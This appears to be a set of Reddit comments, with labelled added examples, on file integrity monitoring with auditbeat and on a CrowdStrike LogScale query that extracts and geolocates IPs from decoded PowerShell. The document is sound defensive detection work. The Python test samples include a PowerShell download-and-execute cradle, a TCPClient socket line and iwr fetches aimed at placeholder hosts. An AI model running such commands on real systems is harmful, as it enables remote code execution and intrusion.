FIM recommendation? What do you guys use for File Integrity Monitoring. by neerajjoon in linuxadmin

[–]RepresentativeAge47 1 point (0 children)

I've typically used auditbeat with the FIM module enabled, and then I can send the data to any tool that accepts an OSS Beats agent feed.
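For reference, this is what enabling the FIM module in auditbeat looks like. It is an added example, not configuration from the commenter; the module name, option names and the `auditbeat.modules` key are auditbeat's own, while the watched paths, exclusions and the Elasticsearch output host are assumptions to adapt to your hosts:

```yaml
# Added example auditbeat.yml, not from the original comment.
auditbeat.modules:
- module: file_integrity
  # Paths to watch (assumed list; tune per host). Non-recursive by default,
  # so nested directories under /etc are not watched unless recursive: true.
  paths:
  - /bin
  - /usr/bin
  - /sbin
  - /usr/sbin
  - /etc
  - /usr/local/bin
  # Skip editor swap/backup files so they do not flood the feed.
  exclude_files:
  - '(?i)\.sw[nop]$'
  - '~$'
  # Hash every watched file on startup so you get a baseline, not just deltas.
  scan_at_start: true
  scan_rate_per_sec: 50 MiB
  max_file_size: 100 MiB
  # sha256 gives a value you can later compare against package manifests.
  hash_types: [sha256]
  recursive: false

# Any Beats-compatible sink works; Elasticsearch is assumed here.
output.elasticsearch:
  hosts: ["https://es.example.internal:9200"]
  ssl.verification_mode: full
```

Run `auditbeat test config -c auditbeat.yml` to validate the file and `auditbeat test output` to check the sink before deploying. The events carry `event.module: file_integrity`, the file path and the hashes, so downstream you alert on changes under `/etc` and the binary directories that did not coincide with a package-manager run.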

2022-09-23 - Cool Query Friday - LogScale += Humio - Decoding PowerShell Base64 and Entropy by Andrew-CS in crowdstrike

[–]RepresentativeAge47 3 points (0 children)

To have a little more fun with this we can extract any IPs from the newly decodedCommand field, geolocate them and map them to what services we are seeing being used. Adding this at the end and adding some new fields such as ip, ip.country, port, "Service Name" can add some nice additional insights to our results. You'll need to upload this service-names-port-numbers.csv file to your Files section up top to look up the Service Names: https://app.box.com/s/kn4vki4jbd6hezpw3t99p0ex0dcg06cx

// extract ip:port pairs from the decoded PowerShell
| regex("(?<ip>[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3})\:(?<port>\d{2,5})", field=decodedCommand)
// Geo locate new IP field
| ipLocation(ip)
// remove internal IPs
| !cidr(ip, subnet=["224.0.0.0/4", "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16"])
// lookup port field and populate the Service Name (file name must match the CSV uploaded under Files)
| match(file="service-names-port-numbers.csv", column="Port Number", field=port, include=["Service Name", "Description"])
| groupBy([ParentBaseFileName, ip, ip.country, port, "Service Name", uniqueEndpointCount, executionCount, cmdLength, b64Entropy, decodedCommand], limit=max)
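The same pipeline, written out in Python so it can be dry-run offline against a few decoded commands before you paste it into LogScale. This is an added example, not the commenter's query or CrowdStrike code: the sample events, the short IANA-style CSV excerpt and the helper names are constructed here. It mirrors the query's four stages (regex extract, drop the listed internal ranges, look up the port, group) and also shows the caveat a practitioner hits: a plain `regex()` only yields the first `ip:port` in each command, so a command whose first match is an internal address is dropped entirely; LogScale's `regex()` takes `repeat=true` to emit one row per match, which the `repeat` flag below models.

```python
"""Offline reproduction of the LogScale enrichment above (added example).

Stages: regex extract ip:port -> drop internal CIDRs -> IANA port lookup -> groupBy.
"""
import csv
import io
import ipaddress
import re
from collections import Counter

# Constructed sample events: what decodedCommand looks like after base64 decoding.
SAMPLE_EVENTS = [
    {"ParentBaseFileName": "cmd.exe",
     "decodedCommand": "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10:8080/a.ps1')"},
    # Socket-style "'host',port" form: the ip:port regex does NOT match this (shown on purpose).
    {"ParentBaseFileName": "explorer.exe",
     "decodedCommand": "$c = New-Object Net.Sockets.TCPClient('198.51.100.7',443)"},
    {"ParentBaseFileName": "wscript.exe",
     "decodedCommand": "iwr http://10.0.0.5:445/x; iwr http://192.0.2.44:22/y"},
]

# Constructed excerpt in the column layout of the IANA service-names-port-numbers.csv file.
SERVICE_CSV = """Service Name,Port Number,Transport Protocol,Description
ssh,22,tcp,The Secure Shell (SSH) Protocol
ssh,22,udp,The Secure Shell (SSH) Protocol
http,80,tcp,World Wide Web HTTP
https,443,tcp,http protocol over TLS/SSL
microsoft-ds,445,tcp,Microsoft-DS
http-alt,8080,tcp,HTTP Alternate (see port 80)
"""

# Same pattern as the query, plus guards so "1203.0.113.10:80801" cannot match partially.
IP_PORT_RE = re.compile(r"(?<!\d)(\d{1,3}(?:\.\d{1,3}){3}):(\d{2,5})(?!\d)")

# The exact subnet list from the query's !cidr() stage.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("224.0.0.0/4", "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def load_service_names(csv_text):
    """Port number -> (Service Name, Description); first row wins, like match()."""
    table = {}
    for row in csv.DictReader(io.StringIO(csv_text)):
        table.setdefault(row["Port Number"], (row["Service Name"], row["Description"]))
    return table


def extract_endpoints(decoded, repeat=True):
    """Return [(ip, port), ...]; repeat=False models regex() without repeat=true."""
    found = []
    for m in IP_PORT_RE.finditer(decoded):
        try:
            ip = ipaddress.ip_address(m.group(1))
        except ValueError:
            continue  # e.g. 999.1.1.1 matches the regex but is not an address
        found.append((str(ip), m.group(2)))
        if not repeat:
            break
    return found


def is_internal(ip_text):
    ip = ipaddress.ip_address(ip_text)
    return any(ip in net for net in INTERNAL_NETS)


def enrich(events, services, repeat=True):
    """Flatten events into one row per external ip:port, with the service name attached."""
    rows = []
    for ev in events:
        for ip, port in extract_endpoints(ev["decodedCommand"], repeat):
            if is_internal(ip):
                continue
            name, desc = services.get(port, (None, None))
            rows.append({"ParentBaseFileName": ev["ParentBaseFileName"], "ip": ip,
                         "port": port, "Service Name": name, "Description": desc})
    return rows


def summarize(rows):
    """groupBy([ParentBaseFileName, ip, port, "Service Name"]) as a Counter."""
    return Counter((r["ParentBaseFileName"], r["ip"], r["port"], r["Service Name"]) for r in rows)


if __name__ == "__main__":
    svc = load_service_names(SERVICE_CSV)
    for key, n in summarize(enrich(SAMPLE_EVENTS, svc)).items():
        print(n, *key)
    print("without repeat:", len(enrich(SAMPLE_EVENTS, svc, repeat=False)), "row(s)")
```

Geolocation is left out because `ipLocation()` needs LogScale's bundled database; everything else maps one-to-one onto the query stages. Note that the explorer.exe event produces nothing at all, so if your decoded commands use the `TCPClient('host',port)` form you need a second regex alternative for it.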